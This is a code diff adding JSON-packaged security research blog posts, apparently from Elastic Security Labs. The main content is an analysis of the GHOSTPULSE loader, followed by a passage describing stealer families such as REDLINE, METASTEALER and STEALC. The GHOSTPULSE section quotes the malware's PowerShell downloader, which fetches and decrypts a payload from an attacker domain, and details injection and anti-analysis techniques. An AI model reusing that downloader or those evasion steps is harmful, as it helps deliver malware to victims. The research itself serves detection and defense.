|\n\nAs seen above, the tree-based model is better suited for classifying benign data while the transformer model does better on malicious samples, so a weighted average or voting ensemble could work well to reduce the total error by averaging the predictions from both models.\n\n## What's next\n\nWe plan to cover our findings from inference caching and model ensembling in a follow-up blog. Stay tuned!\n\nIn the meantime, we’d love to hear about models you're building for inference in Elastic. 
If you'd like to share what you're doing or run into any issues during the process, please reach out to us on our [community Slack channel](https://ela.st/slack) and [discussion forums](https://discuss.elastic.co/c/security). Happy experimenting!\n"
+ },
+ "title": "Getting the Most Out of Transformers in Elastic",
+ "slug": "getting-the-most-out-of-transforms-in-elastic",
+ "date": "2022-08-23",
+ "description": "In this blog, we will briefly talk about how we fine-tuned a transformer model meant for a masked language modeling (MLM) task, to make it suitable for a classification task.",
+ "author": [
+ {
+ "slug": "apoorva-joshi"
+ },
+ {
+ "slug": "thomas-veasey"
+ },
+ {
+ "slug": "benjamin-trent"
+ }
+ ],
+ "image": "machine-learning-1200x628px-2021-notext.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "machine learning"
+ ]
+ },
+ "id": "security_labs_content-getting_the_most_out_of_transforms_in_elastic-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md.json
new file mode 100644
index 00000000000..2f444892325
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md.json
@@ -0,0 +1,34 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"GHOSTPULSE haunts victims using defense evasion bag o' tricks\"\nslug: \"ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks\"\ndate: \"2023-10-27\"\ndescription: \"Elastic Security Labs reveals details of a new campaign leveraging defense evasion capabilities to infect victims with malicious MSIX executables.\"\nauthor:\n - slug: salim-bitam\n - slug: joe-desimone\nimage: \"photo-edited-05@2x.jpg\"\ncategory:\n - slug: attack-pattern\n - slug: malware-analysis\ntags:\n - ghostpulse\n - ref8207\n---\n\n## Update\n\nIn October 2024, we released an update to stage 2 of GHOSTPULSE that includes new evasion techniques. You can check it out [here](https://www.elastic.co/security-labs/tricks-and-treats).\n\n## Preamble\n\nElastic Security Labs has observed a campaign to compromise users with signed [MSIX](https://learn.microsoft.com/en-us/windows/msix/overview) application packages to gain initial access. The campaign leverages a stealthy loader we call GHOSTPULSE which decrypts and injects its final payload to evade detection.\n\nMSIX is a Windows app package format that developers can leverage to package, distribute, and install their applications to Windows users. With [App Installer](https://learn.microsoft.com/en-us/windows/msix/app-installer/app-installer-root), MSIX packages can be installed with a double click. This makes them a potential target for adversaries looking to compromise unsuspecting victims. However, MSIX requires access to purchased or stolen code signing certificates making them viable to groups of above-average resources.\n\nIn a common attack scenario, we suspect the users are directed to download malicious MSIX packages through [compromised websites](https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates), search-engine optimization (SEO) techniques, or malvertising. 
The masquerading themes we’ve observed include installers for Chrome, Brave, Edge, Grammarly, and WebEx, to highlight a few.\n\n\n\nFrom the user's perspective, the “Install” button appears to function as intended. No pop-ups or warnings are presented. However, a PowerShell script is covertly used to download, decrypt, and execute GHOSTPULSE on the system. \n\n\n\n## Malware Analysis\n\nThe GHOSTPULSE loader can be broken down into 3 stages (sometimes preceded by a PowerShell script) used to execute a final payload.\n\n### Stage 0\n\nWe consider the PowerShell script dropped by the malicious MSIX installer to be the stage 0 payload. The PowerShell script is typically included in MSIX infection vectors, but not always in other GHOSTPULSE infection methods (MSI, EXE, ISO). In one sample, the PowerShell script downloads a GPG-encrypted file from `manojsinghnegi[.]com/2.tar.gpg`. \n\nNext, the PowerShell script decrypts the file with the command-line GPG utility, using the following parameters:\n\n- `putin` - the passphrase for the GPG file\n- `--batch` - execute GPG in non-interactive mode\n- `--yes` - answer “yes” to any prompts\n- `--passphrase-fd 0` - read the passphrase from a file descriptor; `0` instructs GPG to use STDIN, where the passphrase putin is supplied\n- `--decrypt` - decrypt a file\n- `--output` - what to save the decrypted file as\n\n```\n# 1\n$url = \"https://manojsinghnegi[.]com/2.tar.gpg\"\n$outputPath = \"$env:APPDATA\\$xxx.gpg\"\nInvoke-WebRequest -Uri $url -OutFile $outputPath\n\n# 2\necho 'putin' | .$env:APPDATA\\gpg.exe --batch --yes --passphrase-fd 0 --decrypt --output $env:APPDATA\\$xxx.rar $env:APPDATA\\$xxx.gpg\n```\n\nThe GPG utility is included in the malicious MSIX installer package.\n\nThe decrypted file is a tar archive containing an executable `VBoxSVC.exe` (in reality a renamed, signed `gup.exe`, the Notepad++ updater, which is vulnerable to sideloading), an encrypted file (in one example, `handoff.wav`), and a mostly benign library 
`libcurl.dll` with one of its functions overwritten with malicious code. The PowerShell script then executes the binary `VBoxSVC.exe`, which side-loads the malicious DLL `libcurl.dll` from the current directory. By minimizing the on-disk footprint of encrypted malicious code, the threat actor is able to evade file-based AV and ML scanning.\n\n\n\n### Stage 1\n\nThe first stage of GHOSTPULSE is embedded within a malicious DLL that undergoes side-loading through a benign executable. Execution of the corresponding code is triggered during the *DllEntryPoint* phase. \n\nThe process is initiated by pinpointing the base address of the malicious DLL `libcurl.dll`, achieved by walking the *InLoadOrderModuleList* list. This list, residing in the Process Environment Block (PEB), systematically records information about loaded modules.\n\n\n\nNext, GHOSTPULSE builds an Import Address Table (IAT) incorporating essential APIs. This operation involves parsing the *InLoadOrderModuleList* structure within the Process Environment Block (PEB).\n\n\n\n``` python\n# Python re-implementation of the API name hashing routine\ndef calculate_api_name_hash(api_name):\n    value = 0\n    for char in api_name:\n        value = (ord(char) + value * 0x1003F) & 0xFFFFFFFF\n    return value\n```\n \nBelow is the Stage 1 IAT structure reconstructed from the GHOSTPULSE malware sample, provided for reference:\n\n``` c\nstruct core_stage1_IAT\n{\nvoid *kernel32_LoadLibraryW;\nvoid *kernel32_QueryPerformanceCounter;\nvoid *ntdll_module;\nvoid *kernel32_CloseHandle;\n__int64 field_20;\n__int64 field_28;\n__int64 field_30;\n__int64 field_38;\nvoid *kernel32_GetTempPathW;\nvoid *kernel32_GetModuleFileNameW;\n__int64 field_50;\n__int64 field_58;\n__int64 field_60;\nvoid *ntdll__swprintf;\n__int64 field_70;\n__int64 field_78;\n__int64 (__fastcall *ntdll_RtlDecompressBuffer)(__int64, __int64, _QWORD, __int64, int, int *);\nvoid *kernel32_CreateFileW;\nvoid *kernel32_ReadFile;\nvoid *ntdll_NtQueryInformationProcess;\nvoid 
*kernel32_GetFileSize;\n__int64 field_A8;\nvoid *kernel32_module;\n__int64 field_B8;\nvoid *ntdll_NtDelayExecution;\n__int64 (__fastcall *kernel32_GlobalAlloc)(__int64, __int64);\n__int64 field_D0;\nvoid *kernel32_GlobalFree;\n__int64 field_E0;\nvoid *ntdll_RtlQueryEnvironmentVariable_U;\n};\n```\n\nIt then proceeds with its operation by reading and parsing the file named `handoff.wav` from the current directory. This file contains an encrypted data blob divided into distinct chunks. Each chunk of data is positioned following the string IDAT. The parsing process involves the malware executing through two distinct steps.\n\n\n\nThe initial phase involves identifying the commencement of the encrypted data by searching for the IDAT string in the file, which is followed by a distinctive 4-byte tag value. If the tag corresponds to the value stored in the malware's configuration, the malware extracts the bytes of the encrypted blob. The initial structure is as follows:\n\n``` c\nstruct initial_idat_chunk\n{\n DWORD size_of_chunk;\n DWORD IDAT_string;\n DWORD tag;\n DWORD xor_key;\n DWORD size_of_encrypted_blob;\n _BYTE first_chunk[];\n};\n```\n \n- **size_of_chunk**: The malware utilizes this value, performing bits shifting to determine the chunk size to extract before the next occurrence of IDAT. 
\n- **xor_key**: A 4-byte long XOR key employed for decrypting the consolidated encrypted blob after extraction\n- **size_of_encrypted_blob**: Denotes the overall size of the encrypted blob, which is stored in chunks within the file \n- **first_chunk**: Marks the start of the first chunk of data in memory\n \n\n\nIn the second step, the malware locates the next occurrence of IDAT and proceeds to extract the encrypted chunks that follow it, which have the following format: \n\n``` c\nstruct next_idat_chunk\n{\nDWORD size_of_chunk;\nDWORD IDAT_string;\n_BYTE n_chunk[];\n};\n```\n\n- **size_of_chunk**: The malware utilizes this value, performing bit shifting to determine the chunk size to extract before the next occurrence of IDAT. \n- **n_chunk**: Marks the start of the chunk of data in memory\n\nThe malware continues extracting encrypted data chunks until it reaches the specified *size_of_encrypted_blob*. Subsequently, the malware proceeds to decrypt the data using the 4-byte XOR key *xor_key*.\n\nAt this stage, the data blob, which is already compressed, undergoes decompression by the malware. The decompression process utilizes the `RtlDecompressBuffer` API.\n\n\n \nThe malware proceeds by loading a specified library stored in its configuration, in this case, `mshtml.dll`, utilizing the *LoadLibraryW* function. Shellcode (Stage 2) contained inside the decrypted and decompressed blob of data is written to the .text section of the freshly loaded DLL and then executed.\n\nThis technique is known as “module stomping”. 
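The chunk walking and XOR decryption described above can be sketched in Python. This is an illustrative re-implementation, not code from the sample: the function names are ours, and the chunk-size arithmetic is simplified.

```python
import struct

def find_idat_offsets(data: bytes):
    """Yield the offset of every IDAT marker in the carrier file."""
    off = data.find(b"IDAT")
    while off != -1:
        yield off
        off = data.find(b"IDAT", off + 4)

def xor_decrypt_blob(blob: bytes, xor_key: int) -> bytes:
    """Apply the 4-byte little-endian XOR key to a reassembled blob."""
    key = struct.pack("<I", xor_key)
    return bytes(b ^ key[i % 4] for i, b in enumerate(blob))
```

Reassembling every chunk up to *size_of_encrypted_blob* and passing the result through `xor_decrypt_blob` yields the compressed Stage 2 blob.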
The following image shows the associated *VirtualProtect* API calls captured with [Elastic Defend](https://www.elastic.co/guide/en/security/current/install-endpoint.html) associated with the module stomping:\n\n\n \n### Stage 2\n\nStage 2 initiates by constructing a new IAT structure and utilizing the CRC32 algorithm as the API name hashing mechanism.\nThe following is the IAT structure of stage 2:\n\n``` c\nstruct core_stage2_IAT\n{\n void *kernel32_module;\n void *ntdll_module;\n void *kernel32_CreateFileW;\n void *kernel32_WriteFile;\n void *kernel32_ReadFile;\n void *kernel32_SetFilePointer;\n void *kernel32_CloseHandle;\n void *kernel32_GlobalAlloc;\n void *kernel32_GlobalFree;\n void *kernel32_ExpandEnvironmentStringsW;\n void *kernel32_GetFileSize;\n void *kernel32_GetProcAddress;\n void *kernel32_LoadLibraryW;\n void *ntdll__swprintf;\n void *kernel32_QueryPerformanceCounter;\n void *ntdll_RtlDecompressBuffer;\n void *field_80;\n void *field_88;\n void *field_90;\n void *field_98;\n void *field_A0;\n void *ntdll_NtDelayExecution;\n void *ntdll_RtlRandom;\n void *kernel32_GetModuleFileNameW;\n void *kernel32_GetCommandLineW;\n void *field_C8;\n void *ntdll_sscanf;\n void *field_D8;\n void *ntdll_NtQueryInformationProcess;\n void *ntdll_NtQuerySystemInformation;\n void *kernel32_CreateDirectoryW;\n void *kernel32_CopyFileW;\n void *ntdll_NtClose;\n void *field_108;\n void *field_110;\n void *field_118;\n void *field_120;\n void *field_128;\n void *kernel32_SetCurrentDirectoryW;\n void *field_138;\n void *kernel32_SetEnvironmentVariableW;\n void *kernel32_CreateProcessW;\n void *kernel32_GetFileAttributesW;\n void *msvcrt_malloc;\n void *msvcrt_realloc;\n void *msvcrt_free;\n void *ntdll_RtlHashUnicodeString;\n void *field_178;\n void *field_180;\n void *kernel32_OpenMutexA;\n void *field_190;\n void *kernel32_VirtualProtect;\n void *kernel32_FlushInstructionCache;\n void *field_1A8;\n void *ntdll_NtOpenProcessToken;\n void *ntdll_NtQueryInformationToken;\n 
void *ntdll_RtlWalkFrameChain;\n void *field_1C8;\n void *addr_temp_file_content;\n void *addr_decrypted_file;\n};\n```\n\nConcerning NT functions, the malware reads the ntdll.dll library from disk and writes it to a dynamically allocated memory space with read, write, and execute permissions. Subsequently, it parses the loaded `ntdll.dll` library to extract the offsets of the required NT functions. These offsets are then stored within the newly built IAT structure. When the malware necessitates the execution of an NT API, it adds the API offset to the base address of `ntdll.dll` and directly invokes the API. Given that NT APIs operate at a very low level, they execute syscalls directly, which does not require the `ntdll.dll` library to be loaded in memory using the LoadLibrary API, this is done to evade userland hooks set by security products.\n\nThe following is the structure used by the malware to store NT API offsets:\n\n``` c\nstruct __unaligned __declspec(align(4)) core_stage2_nt_offsets_table\n{\n __int64 ntdll_module;\n int ZwCreateSection;\n int ZwMapViewOfSection;\n int ZwWriteVirtualMemory;\n int ZwProtectVirtualMemory;\n int NtSuspendThread;\n int ZwResumeThread;\n int ZwOpenProcess;\n int ZwGetContextThread;\n int NtSetContextThread;\n};\n```\n\nGHOSTPULSE has the ability to establish persistence, if configured to, by generating an `.lnk` file that points to the Stage 1 binary, denoted as `VBoxSVC.exe`. To achieve this, the malware leverages COM (Component Object Model) objects as part of its technique.\n\n\n \nIt extracts another sub-blob of data from the first decrypted blob of Stage 1. This data is located at a specific position in the structure. The malware then performs an XOR encryption on this sub-blob, using the result of the XOR operation between the CRC32 value of the machine's computer name and the constant value `0xA1B2D3B4`. 
Finally, the encrypted data is saved to a file in the user's temporary folder.\n\nThe malware then initiates a suspended child process using the executable specified in the Stage 2 configuration, which is a 32-bit `cmd.exe` in this case. It then adds an environment variable to the child process with a random name, example: `GFHZNIOWWLVYTESHRTGAVC`, pointing to the previously created temporary file. \n\nFurther, the malware proceeds by creating a section object and mapping a view of it to `mshtml.dll` in the child process using the `ZwCreateSection` and `ZwMapViewOfSection` APIs.\n\nThe legitimate `mshtml.dll` code is overwritten with the *WriteProcessMemory* API. The primary thread’s execution is then redirected to the malicious code in `mshtml.dll` with the *Wow64SetThreadContext* API as shown in the following image:\n\n\n \nThe parent process promptly terminates itself.\n\n### Stage 3\n\nThe objective of GHOSTPULSE’s Stage 3 is to load and execute the final payload in another process. One interesting part of Stage 3 is that it overwrites its previously executed instructions with new instructions to make analysis difficult. It is also capable of establishing persistence using the same method described above. GHOSTPULSE executes NTDLL APIs using the \"[heaven’s gate](https://www.zdnet.com/article/malware-authors-are-still-abusing-the-heavens-gate-technique/)\" technique.\n\n\n\nStage 3 starts off by constructing its own Function Import Table using CRC32 as the hashing algorithm. 
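Since both Stage 2 and Stage 3 hash export names with CRC32, their import resolution can be mimicked with a short sketch. Helper names are ours, and the seed and name normalization are assumptions:

```python
import zlib

def crc32_api_hash(api_name: str) -> int:
    """CRC32 over the ASCII export name, as used for import resolution."""
    return zlib.crc32(api_name.encode("ascii")) & 0xFFFFFFFF

def resolve_by_hash(export_names, wanted: int):
    """Walk an export list and return the name whose hash matches, if any."""
    for name in export_names:
        if crc32_api_hash(name) == wanted:
            return name
    return None
```

A resolver like this, run over `ntdll.dll`/`kernel32.dll` export tables, is also the basis for recovering the hashed names found in the IAT structures above.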
Additionally, if configured to do so, it can disable WOW64 file system redirection through the procedure `Wow64FsRedirection`.\n\nFollowing this, Stage 3 accesses the environment variable that was set earlier, in our case `GFHZNIOWWLVYTESHRTGAVC`, retrieves the associated temporary file and proceeds to decrypt its contents.\n\n\n\nThe decrypted file includes both a configuration and the ultimate payload in an encrypted format. The final payload undergoes XOR decryption using a 200-byte long key stored within the configuration. The malware then parses the PE structure of the payload with a set of functions that determine how the payload will be injected, for example, the payload type (DLL or executable), architecture, etc.\n\n\n\nGHOSTPULSE employs [Process Doppelgänging](https://www.elastic.co/blog/process-ghosting-a-new-executable-image-tampering-attack), leveraging the NTFS transactions feature to inject the final payload into a new child process. 
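The final payload decryption described above amounts to repeating-key XOR; a minimal sketch (the helper name is ours):

```python
from itertools import cycle

def xor_with_config_key(payload: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, as applied to the final payload with the
    200-byte key carried in the decrypted configuration."""
    return bytes(p ^ k for p, k in zip(payload, cycle(key)))
```

Because XOR is its own inverse, the same helper both encrypts and decrypts, which is what makes the 200-byte key in the configuration sufficient to recover the payload.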
The following steps illustrate the process:\n\n- Calls the `CreateTransaction` API to initiate a transaction\n- Creates a transaction file with a random file name in the temp folder with the `ZwCreateFile` API\n- Writes the payload to the temp file using the `ZwWriteFile` API\n- Creates a section of the transaction file with the `ZwCreateSection` API\n- At this point the file is no longer needed, so the malware calls the `RollbackTransaction` API to roll the transaction back\n- GHOSTPULSE creates a suspended process with the target process path taken from its configuration, in our sample `msbuild.exe`\n- It maps a view of the section to the process with the `ZwMapViewOfSection` API\n- It sets the child process thread instruction pointer to the entry point of the final payload with the `NtSetContextThread` API\n- Finally, it resumes the thread with the `NtResumeThread` API\n\n\n\n### Final Payload\n\nThe final payload varies from sample to sample but is typically an information stealer. We have observed SectopRAT, Rhadamanthys, Vidar, Lumma, and NetSupport as final payloads. In SectopRAT samples, the malware first reaches out to Pastebin to retrieve the command and control address. In this case, it was `195.201.198[.]179` over TCP port `15647` as shown below:\n\n\n\n## Configuration extractor\n\nAlongside this research, the Elastic Security Research Team has provided a [configuration extractor](https://github.com/elastic/labs-releases/blob/main/tools/ghostpulse/ghostpulse_payload_extractor.py) to allow threat researchers to continue work to discover further developments within this campaign and expand detection capabilities for our community. 
The extractor takes the encrypted file shipped with GHOSTPULSE as the input.\n\n\n\n## Detection Guidance\n\nElastic Defend detects this threat with the following [behavior protection rules](https://github.com/elastic/protections-artifacts/tree/main/behavior):\n\n- DNS Query to Suspicious Top Level Domain\n- Library Load of a File Written by a Signed Binary Proxy\n- Suspicious API Call from an Unsigned DLL\n- Suspicious Memory Write to a Remote Process\n- Process Creation from Modified NTDLL\n\nThe following yara rule will also detect GHOSTPULSE loaders on disk:\n\n- [Windows.Trojan.GhostPulse](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_GhostPulse.yar)\n\n## Observations\n \nAll observables are also available for [download](https://github.com/elastic/labs-releases/tree/main/indicators/ghostpulse) in both ECS and STIX format.\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n|------------------------------------------------------------------|-------------|-----------------|-----------------------------|\n| 78.24.180[.]93 | ip-v4 | | Stage 0 C2 IP |\n| manojsinghnegi[.]com | domain-name | | Stage 0 C2 domain |\n| manojsinghnegi[.]com/2.tar.gpg | url | | Stage 0 C2 URL |\n| 0c01324555494c35c6bbd8babd09527bfc49a2599946f3540bb3380d7bec7a20 | sha256 | Chrome-x64.msix | Malicious MSIX |\n| ee4c788dd4a173241b60d4830db128206dcfb68e79c68796627c6d6355c1d1b8 | sha256 | Brave-x64.msix | Malicious MSIX |\n| 4283563324c083f243cf9335662ecc9f1ae102d619302c79095240f969d9d356 | sha256 | Webex.msix | Malicious MSIX |\n| eb2addefd7538cbd6c8eb42b70cafe82ff2a8210e885537cd94d410937681c61 | sha256 | new1109.ps1 | PowerShell Downloader |\n| 49e6a11453786ef9e396a9b84aeb8632f395477abc38f1862e44427982e8c7a9 | sha256 | 38190626900.rar | GHOSTPULSE tar archive |\n| Futurity Designs Ltd | Code signer | | Chrome-x64.msix code signer |\n| Fodere Titanium Limited | Code signer | | Brave-x64.msix code 
signer |\n| IMPERIOUS TECHNOLOGIES LIMITED | Code signer | | Webex.msix code signer |\n\n## References\n\n- [https://twitter.com/1ZRR4H/status/1699923793077055821](https://twitter.com/1ZRR4H/status/1699923793077055821)\n- [https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/](https://www.rapid7.com/blog/post/2023/08/31/fake-update-utilizes-new-idat-loader-to-execute-stealc-and-lumma-infostealers/)\n- [https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates](https://www.proofpoint.com/us/blog/threat-insight/are-you-sure-your-browser-date-current-landscape-fake-browser-updates)\n"
+ },
+ "title": "GHOSTPULSE haunts victims using defense evasion bag o' tricks",
+ "slug": "ghostpulse-haunts-victims-using-defense-evasion-bag-o-tricks",
+ "date": "2023-10-27",
+ "description": "Elastic Security Labs reveals details of a new campaign leveraging defense evasion capabilities to infect victims with malicious MSIX executables.",
+ "author": [
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "joe-desimone"
+ }
+ ],
+ "image": "photo-edited-05@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ },
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ghostpulse",
+ "ref8207"
+ ]
+ },
+ "id": "security_labs_content-ghostpulse_haunts_victims_using_defense_evasion_bag_o_tricks-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-globally_distributed_stealers-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-globally_distributed_stealers-md.json
new file mode 100644
index 00000000000..52edd9a7332
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-globally_distributed_stealers-md.json
@@ -0,0 +1,33 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Globally distributed stealers\"\nslug: \"globally-distributed-stealers\"\ndate: \"2024-05-24\"\ndescription: \"This article describes our analysis of the top malware stealer families, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly.\"\nauthor:\n - slug: salim-bitam\n - slug: daniel-stepanic\n - slug: terrance-dejesus\n - slug: samir-bousseaden\nimage: \"Security Labs Images 25.jpg\"\ncategory:\n - slug: malware-analysis\n---\n\n## Introduction\n\nThis article describes our analysis of the top Windows malware stealer families that we’ve identified, unveiling their operation methodologies, recent updates, and configurations. By understanding the modus operandi of each family, we better comprehend the magnitude of their impact and can fortify our defences accordingly. Additionally, we’ll examine our unique telemetry to offer insights about the current volume associated with these prevalent malware stealer families.\n\nMitigating this kind of covert threat requires a multi-faceted approach consistent with defense-in-depth principles. We will likewise describe various techniques for detection, including the use of ES|QL hunting queries and Yara rules which empower organizations to proactively defend against them.\n\n## Telemetry overview\n\nThe telemetry data showcased in this article encompasses insights gathered from both internal and external sources, providing a comprehensive understanding of threat activity.\n\nNotably, between 2022 and 2023, REDLINE emerged as the most prevalent malware in the wild, closely trailed by AGENT TESLA, VIDAR, and then STEALC. 
It's worth highlighting that this period marked the debut of STEALC in the wild, indicative of evolving threat landscapes.\n\nIn the subsequent time frame, spanning from 2023 to 2024, there was a notable spike in AGENT TESLA activity, followed by REDLINE, STEALC, and VIDAR, reflecting shifting trends in malware prevalence and distribution.\n\n\nElastic telemetry data May 2023 - May 2024\n\nDespite fluctuations in general malware prevalence, AGENT TESLA has consistently maintained its position as a prominent threat. This enduring dominance can be attributed to several factors, including its relatively low price point and enticing capabilities, which appeal to a wide range of threat actors, particularly those operating with limited resources or expertise.\n\nA noteworthy observation is that due to METASTEALER’s foundation on REDLINE, certain METASTEALER samples may inadvertently fall under the categorization of REDLINE.\n\n\n\n## Top stealers overview\n\n### REDLINE (REDLINE STEALER)\n\n[REDLINE](https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer) made its debut in the threat landscape in 2020, leveraging email as its initial distribution method; it operates on a Malware-as-a-Service (MaaS) model, making it accessible to a wide range of threat actors. Its affordability and availability in underground forums have contributed to its popularity among cybercriminals.\n\nThe latest operations of REDLINE involve multiple infection vectors, including email phishing, malicious websites hosting seemingly legitimate applications, and social engineering tactics. Our researchers analyzed a recent sample [reported by vx-underground](https://x.com/vxunderground/status/1634713832974172167) indicating a campaign targeting engineers on the freelancing platform Fiverr. 
This tactic poses significant risks, potentially leading to the compromise of companies through unsuspecting freelancers.\n\nREDLINE is built on the .NET framework, which provides it with portability and ease of implementation. It has a variety of functionalities aimed at gathering vital system information and extracting sensitive data:\n\n - System information acquisition:\n - Collects essential system details such as UserName, Language, and Time Zone\n - Retrieves hardware specifics including processor and graphic card information\n - Monitors running processes and identifies installed browsers\n - Data extraction:\n - Targets browser data repositories, extracting saved passwords, credit card details, cookies, and auto-fill entries\n - Procures VPN login credentials for unauthorized access\n - Logs user credentials and chat histories from platforms like Discord and Telegram\n - Identifies and steals cryptocurrency wallets, potentially compromising valuable digital assets:\n\n\n\nREDLINE uses a string obfuscation technique to hinder analysis and evade detection based on strings like yara by dynamically constructing the strings at runtime from an array of characters:\n\n\n\nIts configuration is structured within a static class, containing four public fields: ```IP```, ```ID```, ```Message```, and an XOR Key. The ```IP``` and ```ID``` fields contents are encrypted using XOR encryption and then encoded in base64 as depicted below:\n \n\n\n### METASTEALER\n\n[METASTEALER](https://malpedia.caad.fkie.fraunhofer.de/details/win.metastealer) emerged in 2022, initially advertised as a derivative of REDLINE, with additional features; our malware analysts recently encountered a sample of METASTEALER within a campaign masquerading as Roblox, previously [reported by CERT as Orange Polska](https://x.com/CERT_OPL/status/1767191320790024484). 
\n\nMETASTEALER is primarily developed using the .NET framework, facilitating its compatibility with Windows environments and enabling ease of implementation. Certain versions employ obfuscation methods, including obscuring the control flow of the malware, making it more challenging to detect or analyze.\n\nThis METASTEALER sample utilizes the [AGILE.NET](https://www.secureteam.net/) obfuscator, specifically its proxy call obfuscation method. This technique is used to conceal the direct invocation of an original function by introducing an additional layer of abstraction. Instead of directly invoking the function, AGILE.NET generates a proxy method that then invokes the original function. This added complexity makes it more challenging for code analysts to discern the sequence of actions.\n\n\n\nLooking at the code above, we can see the method `Delegate11.smethod_0` calls a `Delegate11.delegate11_0` which is not initialized, introducing ambiguity during static analysis as analysts cannot determine which method will actually be executed.\n\n\n\nAt runtime, the malware initializes the delegate by calling the method `Class4.smethod_13` in the constructor of the `Delegate11` class. This method constructs a dictionary of token values, where each key represents the token value of a delegate (e.g., ```0x040002DE```), and its corresponding value represents the token of the original method to be executed. This dictionary is constructed from a sequence of bytes stored in the binary, enabling dynamic resolution of method invocations during runtime.\n\nFollowing this, it will generate a dynamic method for the delegate and execute it using the `smethod_0` function.\n\n\n\n\n\nAll the important strings in the configuration, like the C2 IP address and port, are encrypted. 
The malware has a class called `Strings` that is called at the start of execution to decrypt all the strings at once, a process involving a combination of Base64 encoding, XOR decryption, and AES CBC decryption.\n\nInitially, the AES parameters, such as the ```AES KEY``` and ```AES IV```, undergo decryption. In the provided example, the ```AES KEY``` and ```AES IV``` are first base64 decoded. Subsequently, they are subjected to XOR decryption using a predetermined XOR key, followed by two consecutive base64 decoding steps.\n\n\n\nThe Strings class holds byte arrays that are decrypted using AES CBC after being reversed, and then appended to the **Strings.Array** list. Later, when the malware requires specific strings, it accesses them by indexing this list. For example **String.get(6)**.\n\n### STEALC\n\nA recent major player in the stealer space [discovered](https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/) by Sekoia in February 2023 is the [STEALC](https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc) family. This malware was first advertised in an underground forum in January 2023 where the developer mentioned a major dependency on existing families such as VIDAR, RACOON, and REDLINE. Since this timeframe, our team has observed new STEALC samples daily showing signs of popularity and adoption by cybercriminals.\n\nSTEALC is implemented in C and includes features like dynamic imports, string obfuscation, and various anti-analysis checks prior to activating its data-stealing capabilities. In order to protect the binary and its core features, STEALC encrypts its strings using a combination of Base64 + RC4 using a hardcoded key embedded in each sample.\n\n\n\nThere are 6 separate functions used for anti-analysis/anti-sandbox checks within STEALC. 
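The Base64 + RC4 string protection mentioned above can be reproduced with a short sketch; the decode-then-RC4 order and the helper names are our assumptions, not extracted sample code:

```python
import base64

def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA); encryption and decryption are identical."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for b in data:                            # pseudo-random generation
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(b ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

def stealc_decrypt_string(b64_blob: str, key: bytes) -> bytes:
    """Base64-decode, then RC4-decrypt with the sample's hardcoded key."""
    return rc4(key, base64.b64decode(b64_blob))
```

Because RC4 is symmetric, a helper like this also lets an analyst re-encrypt test strings when validating a recovered key against a sample.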
STEALC will terminate itself if the active processor count is less than 2.\n\n\n\nSTEALC performs a sandbox/emulation test using a more obscure Windows API (`VirtualAllocExNuma`) to allocate a large amount of memory. If the API is not implemented, the process will terminate.\n\n\n\nThe malware performs another sandbox check by reading values from `GlobalMemoryStatusEx`. After a byte shift against the collected attributes of the physical memory, if the value is less than ```0x457``` the sample will terminate. \n\nThe malware will stop execution if the language identifier matches one of the following LangIDs:\n - Russian_Russia (```0x419```)\n - Ukrainian_Ukraine (```0x422```)\n - Belarusian_Belarus (```0x423```)\n - Kazakh_Kazakhstan (```0x43f```)\n - Uzbek_Latin__Uzbekistan (```0x443```)\n\nSTEALC also incorporates the Microsoft Defender emulation check, which we have observed in many stealers such as [LOBSHOT](https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware). STEALC will terminate if it matches the hard-coded values used inside Microsoft Defender’s emulation layer: the username ```JohnDoe``` and a computer name of ```HAL9TH```.\n\n\n\nOne of the more impactful anti-analysis checks that comes with STEALC is an expiration date. This unique value gets placed into the malware’s config to ensure that the stealer won’t execute after a specific date set by the builder. 
